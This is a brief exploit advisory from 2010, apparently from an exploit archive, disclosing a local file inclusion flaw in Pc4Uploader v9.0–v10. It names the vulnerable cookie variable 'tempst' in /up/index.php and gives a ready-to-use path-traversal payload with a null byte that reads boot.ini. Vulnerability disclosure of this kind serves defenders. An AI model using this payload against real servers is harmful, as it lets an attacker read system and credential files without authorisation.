Pc4Uploader v9.0 - v10 Local File Include vulnerability
Posted on 26 March 2010
======================================================= Pc4Uploader v9.0 - v10 Local File Include vulnerability ======================================================= [+]-------------------------------------[+] [+] Title : Pc4Uploader v9.0 - v10 Local File Include vulnerability [+] Homepage: http://www.pc4arb.com/product-20.html [+] Download: http://www.mnzo3.com/vb/attachment.php?attachmentid=886&d=1240346263 [+] Parameter: COOKIE [+]-------------------------------------[+] [+] Discovered by Br0k3n-H34rT [+] My Homepage : WwW.W-Dev.CoM [+] My Note : Every Thingz Can Develop It,z , When We Think About It,z [+]-------------------------------------[+] [+] [1]: Local File Include : [+] This Work If Magic_Quates Is Off (Regardless php.ini Setting). [+] # Affected Files : [+] /up/index.php [+] # Affected Variable : [+] tempst [+] # Parameter : [+] COOKIE . [+] # e.g. : http://localhost/up/index.php Cookie: PHPSESSID=2e970d2361293815462ffaa028135c23;tempst=../../../../../../../../boot.ini%00 # Inj3ct0r.com [2010-03-26]
